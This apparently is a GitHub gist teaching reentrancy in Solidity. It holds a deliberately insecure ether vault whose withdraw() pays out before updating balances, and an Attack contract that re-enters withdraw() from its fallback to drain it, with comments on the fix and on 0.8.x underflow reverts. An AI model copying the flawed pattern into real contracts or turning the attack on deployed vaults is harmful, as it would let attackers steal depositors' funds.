@kyriediculous
Created April 8, 2023 10:07
// SPDX-FileCopyrightText: 2023 Tenderize <info@tenderize.me>
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
/// @title VulnerableContract
/// @notice Deliberately insecure ether vault that illustrates reentrancy; not for deployment.
/// @dev withdraw() performs its external call before it updates the caller's balance, so the
/// recipient's code can call withdraw() again while the recorded balance is still unchanged.
contract VulnerableContract {
// Ether credited to each depositor, in wei (msg.value is added as-is).
mapping(address => uint256) public balances;
// Payable, so ether can be sent at deployment; that ether is not credited to any entry in balances.
constructor() payable {}
/// @notice Credits the ether sent with the call to the sender's balance.
function deposit() public payable {
balances[msg.sender] += msg.value;
}
/// @notice Sends `amount` wei to the caller, then deducts it from the caller's balance.
/// @dev Reentrancy hazard: the order here is check, external call, state update. Ordering it as
/// check, state update, external call (checks-effects-interactions), or guarding the function
/// with a reentrancy lock, closes the window.
/// NOTE(review): the pragma selects 0.8.x, where the subtraction below is checked. If a
/// re-entered call has already reduced the balance, the outer subtraction reverts on underflow
/// and the revert propagates through the call chain. That behaviour is incidental and should
/// not be treated as the protection; it is absent inside `unchecked` blocks and in pre-0.8
/// compilers.
function withdraw(uint256 amount) public {
// Check: reads the balance, which has not been reduced yet.
require(balances[msg.sender] >= amount);
// Interaction: low-level call with no gas limit set; control passes to msg.sender's code.
(bool success,) = payable(msg.sender).call{value: amount}("");
require(success, "transfer failed");
// Effect: the balance is only updated after the external call has returned.
balances[msg.sender] -= amount;
}
}
/// @title Attack
/// @notice Proof-of-concept caller that exercises the reentrancy in VulnerableContract.withdraw().
/// @dev Deposits once, withdraws once, and re-enters withdraw() from fallback() each time ether
/// arrives.
/// NOTE(review): under the 0.8.x pragma the target's checked subtraction underflows as the
/// nested calls unwind, so the sequence is expected to revert as a whole once re-entry has
/// happened. Confirm with a local test before drawing conclusions from this sample.
contract Attack {
// Amount deposited by attack() and requested in every withdraw() call.
uint256 constant amount = 1 ether;
// Target instance; assigned once in the constructor.
VulnerableContract vulnerableContract;
// Payable, so ether can be sent at deployment.
constructor(VulnerableContract _vulnerableContract) payable {
vulnerableContract = _vulnerableContract;
}
/// @notice Deposits `amount` into the target and immediately requests it back.
/// @dev msg.value is not compared with `amount`; the deposit is paid from this contract's balance.
function attack() payable public {
vulnerableContract.deposit{value: amount}();
vulnerableContract.withdraw(amount);
}
/// @dev Runs when the target's call{value: amount}("") reaches this contract (no receive() is
/// defined). Calls withdraw() again while the target still holds at least `amount`; the balance
/// test is what ends the recursion.
fallback() payable external {
if (address(vulnerableContract).balance >= amount) vulnerableContract.withdraw(amount);
}
}